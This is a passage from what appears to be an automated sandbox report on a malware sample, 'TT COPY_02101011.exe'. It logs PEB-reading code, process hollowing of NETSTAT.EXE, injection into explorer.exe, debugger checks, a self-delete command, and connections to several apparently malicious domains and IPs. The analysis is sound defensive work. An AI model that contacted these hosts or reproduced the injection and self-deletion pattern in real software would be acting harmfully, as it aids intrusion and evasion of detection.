          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03219100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03242990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03297016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03297016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03297016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03230050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03230050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03219080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03293884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03293884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03214F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03214F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03228794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03297794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03297794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03297794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032CFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03248E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03227E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03227E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03227E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03227E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03227E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03227E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03258EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032CFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0329A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03244D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03244D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03244D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03253D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03293540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032C3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03237D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03241DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03241DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03241DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03242581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03242581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03242581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03242581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03212D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03212D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03212D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03212D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03212D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00409B50 LdrLoadDll,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_1000EDD1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 37.123.118.150 80
          Source: C:\Windows\explorer.exeNetwork Connect: 213.186.33.5 80
          Source: C:\Windows\explorer.exeDomain query: www.webartsolution.net
          Source: C:\Windows\explorer.exeNetwork Connect: 185.65.236.168 80
          Source: C:\Windows\explorer.exeDomain query: www.mcclureic.xyz
          Source: C:\Windows\explorer.exeDomain query: www.gadget198.xyz
          Source: C:\Windows\explorer.exeDomain query: www.intelldat.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.96.23.237 80
          Source: C:\Windows\explorer.exeDomain query: www.helpfromjames.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.158.42 80
          Source: C:\Windows\explorer.exeDomain query: www.le-hameau-enchanteur.com
          Source: C:\Windows\explorer.exeDomain query: www.blttsperma.quest
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.125.56 80
          Source: C:\Windows\explorer.exeNetwork Connect: 151.139.128.11 80
          Source: C:\Windows\explorer.exeDomain query: www.yesrecompensas.lat
          Source: C:\Windows\explorer.exeDomain query: www.henleygirlscricket.com
          Source: C:\Windows\explorer.exeNetwork Connect: 143.95.80.65 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: EA0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: unknown protection: read write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeMemory written: C:\Users\user\Desktop\TT COPY_02101011.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3424
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeProcess created: C:\Users\user\Desktop\TT COPY_02101011.exe "C:\Users\user\Desktop\TT COPY_02101011.exe"
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TT COPY_02101011.exe"
          Source: explorer.exe, 00000004.00000000.683168354.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000004.00000000.704124995.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000004.00000000.721487248.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.704735260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.721832554.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.683913332.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000009.00000002.936194412.0000000005680000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.704735260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.721832554.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.709424798.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.683913332.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000009.00000002.936194412.0000000005680000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
